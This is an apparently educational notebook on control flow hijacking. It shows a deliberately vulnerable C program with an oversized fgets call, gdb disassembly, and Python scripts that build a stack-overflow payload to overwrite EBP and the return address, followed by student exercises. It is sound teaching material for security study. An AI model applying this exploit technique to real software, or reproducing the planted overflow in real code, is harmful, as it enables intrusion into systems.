# Control Flow Hijacking

The previous notebook ended on a bit of a cliffhanger. We overflowed a buffer and overwrote the return address on the stack. I implied we could use that for even more evil purposes. Let's get to business!

At the end of every function, we execute a return instruction. Return pops the return address off the stack and starts executing at that address. With our buffer overflow, we now control the return address. If we're clever about what we put into the buffer, we can use the overflow to redirect execution to a new destination. This is called **control flow hijacking**. That's our mission in this notebook. We're hijackers!

Let's demonstrate the concept with a simplified version of the code we used in the previous notebook. In "buffojack.c", you'll find the following C program.

In [None]:
#include <stdio.h>

int bar(){
        printf("This code never gets executed.\n");
        return 0;
}

int foo(){
    char buff[128];
    printf("Enter your name:\n");
    fgets(buff,256,stdin);
    return 0;
}

int main(){
        foo();
        return 0;
}

If you run buffojack, you'll see it's basically buffo without the nice message. We got rid of the print statements to simply and added a new function named "bar". "bar" does nothing, because it never gets called... does it?

## Finding Our Target

Let's call "bar" without changing the C code. Let's hijack control flow and point it at "bar". We'll use the buffer overflow to overwrite the return address. We'll overwrite it with the address of "bar".

First, let's find our target in the start of "bar". Running "gdb buffojack" and disassembling "bar", we see the following assembly code:

In [None]:
   0x080488a5 <+0>:     push   ebp
   0x080488a6 <+1>:     mov    ebp,esp
   0x080488a8 <+3>:     sub    esp,0x8 <----------- OUR TARGET
   0x080488ab <+6>:     sub    esp,0xc
   0x080488ae <+9>:     push   0x80ac248
   0x080488b3 <+14>:    call   0x804f940 <printf>
   0x080488b8 <+19>:    add    esp,0x10
   0x080488bb <+22>:    mov    eax,0x0
   0x080488c0 <+27>:    leave
   0x080488c1 <+28>:    ret

We crashed "buffo" by overwriting the return address in "foo". Let's do the same thing here, but more carefully. The plan is to hijack control flow at the return statement that ends the function "foo".

At the point we're plan to hijack the program, the call stack is set up expecting us to go back to "main" and finish execution. We're not going to do that. Instead, we're going to jump into "bar". This means we need to set things up so "bar" acts like the end of main. When "bar" finishes executing, the program itself will finish.

"main" already executed its prologue, so we'll need to skip the prologue in "bar". This way, the epilogue for "bar" will undo the prologue from "main" and our program will exit gracefully. This means we want to jump right to the sub instruction at memory address 0x080488a8.

So we need to overflow the buffer and overwrite the return address with the value 0x080488a8. That address is the target destination.

## Overwriting the Return Address

As in the previous notebook, we'll build our input using Python. We'll continue in the grand tradition of using 'A's to overflow the buffer. We need a way to put our target address into the buffer. Fortunately, there's a function called "pack" in the "struct" library that will store an integer as a series of bytes. It even takes care of the "endianness" problem, properly reversing the order of the bytes for us. If that's confusing, don't worry about the details. Just trust that the "pack" function puts an integer into our string in the proper format.

All this Python program does is build and print a string of bytes. You can run it in Jupyter to see the string.

In [4]:
from struct import pack

target=0x080488a8
overflow=120

buff=b"A"*overflow+pack("<I",target)

print(buff)

b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa8\x88\x04\x08'


We want to use this as input to buffojack while we're debugging. Let's redirect its output into a file.

./buffojack1.py > input.txt

Now, we can run gdb again.

gdb buffojack

Then we can execute buffojack with our input with this command:

run < input.txt

Nothing happens. The program runs normally. We're not quite overflowing the buffer yet. Disassemble "foo" and set a breakpoint for its return statement. This is the exact moment we want to take control.

disas foo

In [None]:
   0x080488c2 <+0>:     push   ebp
   0x080488c3 <+1>:     mov    ebp,esp
   0x080488c5 <+3>:     sub    esp,0x88
   0x080488cb <+9>:     sub    esp,0xc
   0x080488ce <+12>:    push   0x80ac0e7
   0x080488d3 <+17>:    call   0x8050440 <puts>
   0x080488d8 <+22>:    add    esp,0x10
   0x080488db <+25>:    mov    eax,ds:0x80d949c
   0x080488e0 <+30>:    sub    esp,0x4
   0x080488e3 <+33>:    push   eax
   0x080488e4 <+34>:    push   0x100
   0x080488e9 <+39>:    lea    eax,[ebp-0x88]
   0x080488ef <+45>:    push   eax
   0x080488f0 <+46>:    call   0x804ff90 <fgets>
   0x080488f5 <+51>:    add    esp,0x10
   0x080488f8 <+54>:    mov    eax,0x0
   0x080488fd <+59>:    leave
   0x080488fe <+60>:    ret

We set a breakpoint for that instruction with this command:

break \*0x080488fe

Now, let's rerun the program

run < input.txt

Now we're at that breakpoint. If we view the top of the stack, we see that the proper return address is about to get popped off the stack.

x/wx $esp

You can disassemble "main" to see that 0x08048915 returns into it. Let's look above ESP and try to find out how far away our buffer is. That'll let us know how much further we need to overflow the stack. This command will go back 44 bytes before ESP and print the following 12 words.

x/12wx $esp-44

In [None]:
0xffffd370:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd380:     0x41414141      0x41414141      0x080488a8      0x0804000a
0xffffd390:     0x00000001      0x0804f00b      0xffffd3a8      0x08048915

Each one of the 0x41414141 patterns we see is a series of ASCII 'A's. After all the 'A's, we see the target address 0x080488a8 we put into the buffer. That's the end of our input. There are a four more values, then 0x08048915. Is that value familiar? It's the return address! We need to overflow 5 more 32-bit words to push our target address into the spot that the return address currently occupies. That means we need to add 20 more 'A's to our overflow string.

Fix the script so the variable "overflow" has the right value. When you do, you should be able to run the Python script to build the input, start the debugger, and run the program with the new overflow.

./buffojack1.py > input.txt  
gdb buffojack  
run < input.txt  

If you've got it right, you should see this output:

This code never gets executed.

Program received signal SIGSEGV, Segmentation fault.  
0x080488c0 in bar ()

You did it! You hijacked control flow! Welcome to being evil!

Slight problem, though. You also made the program crash. Not a very smooth hijacking. What happened? Well... you broke EBP.

## Fixing EBP

The previous value of EBP lives just above the return address on the stack. That's why we always see the instruction sequence "leave" and then "ret". "leave" pops off the previous value of EBP, then "ret" pops off the return address. When we overflowed the buffer with 'A's to get our target address in the right spot, we also overflowed the old value of EBP and filled it with 'A's. We need to fix that.

Instead of 'A's, let's put the proper value of EBP into our buffer overflow. When building our buffer overflow, the value *right* before our target *should* be the proper old value of EPB. We don't want 'A's. How can we find the proper value? What *should* be in EBP?

Let's just check what EBP is when everything works properly. Start gdb and set a breakpoint for the instruction we used hijack control flow (the last 'ret' instruction of 'foo'):

break \*0x080488fe

Now run the program normally ("run") and input your name. You should hit the breakpoint. When you do, what value is in EBP? You can check with this command:

info registers

"buffojack2.py" has some Python code that should build the right overflow. You'll have to set the proper values of "ebp_value" and "overflow" though. "buffojack2.py" looks like this:

In [5]:
#!/usr/bin/python

from struct import pack

target=0x080488a8
ebp_value=0x41414141
overflow=120

buff=b"A"*overflow+pack("<I",target)+pack("<I",target)

print(buff)

b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa8\x88\x04\x08\xa8\x88\x04\x08'


If you set the values of the "overflow" and "ebp_value" variables correctly, you should be able to run buffojack in the debugger and get this output:

In [None]:
(gdb) run < input.txt
Starting program: /home/jupyter-rmc3832/buffo/buffojack < input.txt
Enter your name:
This code never gets executed.
[Inferior 1 (process 24900) exited normally]

Can you hijack control flow and gracefully exit the program?

## Exercises

You've already been issued the challenge for this lesson. Hijack control flow in "buffo". Once you do, answer the following questions:

1) What were the values of "overflow" and "ebp_value" that cleanly hijacked execution? How did you find them? What does your buffojack2.py script look like?

2) Does your hijack work outside of the debugger? In other words, what happens if you run buffojack at the command line like this:

./buffojack < input.txt

Any guesses about why this happens?

**HINT:** People on [Stack Overflow](https://stackoverflow.com/questions/17775186/buffer-overflow-works-in-gdb-but-not-without-it) might know the answer.